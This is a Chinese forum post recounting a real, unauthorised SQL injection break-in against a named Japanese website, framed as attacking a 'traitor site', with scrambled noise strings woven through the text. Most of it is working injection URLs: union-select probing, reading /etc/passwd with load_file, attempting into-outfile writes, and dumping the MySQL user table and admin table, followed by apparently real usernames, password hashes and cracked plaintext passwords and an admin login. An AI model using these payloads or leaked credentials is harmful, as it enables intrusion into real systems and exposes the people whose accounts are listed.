找回密码
 立即注册
查看: 3585|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
补:www.zuaa.jp测试

5 M  d$ d* P. `! W; I; A
) n8 J/ e  e! L7 T5 O0x01. 检测 www.zuaa.jp 收集数据8 H! M- G! G( X, k: }2 E$ ?3 c

" f  j& b5 M6 z0 W& [1 J& }7 Q2 k- d' ]/ T0 I% H; |1 ^' y
whatweb
$ k1 {) }: Z: t* U# f$ _; B4 t3 v! C! q3 l

* F' x8 w7 `* U6 V3 t% i利用NMAP扫描! T, L0 b& V( e# |0 @# g
! s" r+ S+ w: X# L
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
4 [+ U8 D9 ?1 N6 d8 o) ~; |9 S0x02.找注入点" o* P6 p( u8 t* Y, _
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390# q$ R1 m2 Q" F
, X/ j& @9 p8 M! w7 u9 v4 g

  Y6 a1 Q7 Z. w3 M0x03.order by0 |2 l! h  h! `% D* N2 ]6 Z
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1" J. h2 P8 Q8 v+ i
* b! [' Y" m: r3 t  v) e3 S
order by 28报错,order by 27正常" Q* Y) E: ?5 @, {
" v" m$ o3 ]' L3 k# i
0x04.   union手动查询
0 t6 y$ q: G* }6 {http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
$ p" E5 `4 E$ N' |; [) `4 @2 I添加到 27 时正常显示 2 n: {# ]" T6 i. y. y
) H. a* y1 i% N4 }
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
0 ^: z8 m7 J5 t8 H% I+ C# H7 y8 e2 X: ]# Y
0x05. info:- b) Q8 [! {: B. c+ Q
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
9 B. u# ~9 C# ^" X8 f% |/ o
) t" M7 m" J& V9 r2 t, [' \- |user:            root@localhost. B  k. @1 }' z# I
database:    openpne
4 ]) k9 ]$ Q  {* B1 Vversion:      4.1.22+ [% B0 W2 q$ Z( a/ X# ~
os:             portbld-freebsd5.4
/ o: j( ~  T! X+ [
8 q& V- x+ Y$ a$ p5 h0x06. root用户/ n5 ~! F  S  x8 N1 `+ L, T. t) ?
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)  F' t" c/ }$ a& A/ q
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
% a! X% U9 E2 O% I0 m
4 @; R  c  G) ~$ E3 M1 g  z2 N2 T通过工具转换0 E, z% n& H3 _- }- a
: _0 L  W% k9 T0 f5 W
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
0 L  c; x+ ]$ L* R' S; V6 Y8 F) Z6 g" r$ f, J3 q8 }: v
0x07. 利用 into outfile
, ?5 A4 f2 V& h3 @1 z6 O- ]- u% o全部都失败0 [3 Z; k' ]% y, D8 c6 i
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
7 o" h% f+ R$ q" V5 J7 O% u3 g' I4 V: q4 A6 l) @+ ]; P& H3 Q
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php + S. x  f1 B- L5 y
; f- U5 G- U6 g5 j
页面显示“MDB2 Error:syntax error”6 q- k% x% s# d
5 U  E) c# Z4 ?7 {2 q  ~/ D  g
0x08. 利用 mysql 4.1
) f; G" A# c# c4 [( h2 r猜常规表名,字段未果 工具 sqlmap) |+ @  r: e. g1 l
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
- x) g- v7 J8 a
3 l( k6 a9 p, G9 g/ N9 i
" Y6 s( q1 g- h" i0 }1 S% F% F- I
0x09. 查找后台
% y6 U' z) o* k; K" @+ Y/ w利用 现有的各种 后台工具尝试都不行1 B  p  J! s! l2 ^' P  \

7 H2 w+ t. t7 E. c+ n; P$ |, A0x10.  MySL外联方法# `0 x' p( }$ l- Z8 Y
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
6 {  Q1 @- X: T( @7 {5 x可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user$ H1 I; u6 D' n* m" v
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user9 O/ u3 D7 k# o

$ L4 j2 m! V$ k& o% c这个可以在 www.cmd5.com 解密
0 [- G' Y: c7 \) u# D9 Sroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009! S5 Q( x" K! h2 C& F( u. Y
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
- \8 H6 n) V7 N: C5 Zopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
/ ?1 e- Z9 u4 o' T! H7 ~5 A5 u6 hzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???0 S9 T( z, r& C) A  I" U
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
% Q$ S, d  `3 I8 k! t( e
7 g* x: \: A3 R# x2 W. G
7 ?% u* V( ]; E' _7 `/ I0x11. 网站突破
. X* b+ w, D0 X# c( B发现网站的源程序 openpne, google 下载 openpne 源码1 N- w' F/ y: J8 j& x1 K

; Z* ~5 E! y  b' U; u% s8 ^  w3 m  \" n4 ?# H! B. B
0x12. 默认信息利用7 K" Q* K# I& V, J8 Y8 E+ {$ }
http://sns.zuaa.jp/?m=admin&a=page_login& `. R7 C3 K$ B

5 Y. P, Y# b' s0 g/ a( J2 j表名 (c_admin_user) ,字段名(username,password)
2 u0 Q; C2 v0 Y9 y& ahttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
0 u8 L% x4 j& B6 A% M+ n7 q2 p! E( l! Z* _
解密
+ |0 i2 M# B2 j4 ?4 ]/ Lzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009& U3 s7 q, _( U/ [
zuaajp:c0923ec5857796a393da99905008c176,          zju18978 F4 N8 c; U0 b( K6 R
& U. s# n/ \  z
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持9 _8 N5 D* Q8 j  n# i" }. c1 k  D

( S" z# a7 E. l9 ?; }4 x0x13. 登录后台" x, q  K' h5 K8 G6 f8 h1 ^

% c+ K7 ?3 f9 Y8 z+ C" }( o) ~1 v" Z) ?& M
" M8 R1 K3 B3 ]5 W
0x14. 小结
2 P+ x  k- a& v3 d- ~0 {2 R. A利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
) q% U" B( r& y( v7 t感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
: m; q* d) B* S& q0 O6 Q------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain5 E) s, N1 ~. P
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
4 _0 Y" [1 c7 l9 j* d( H$ y+ t4 W! D1 x, L2 H, T
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!0 |' i( T+ J9 C, B+ W5 Z, `

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表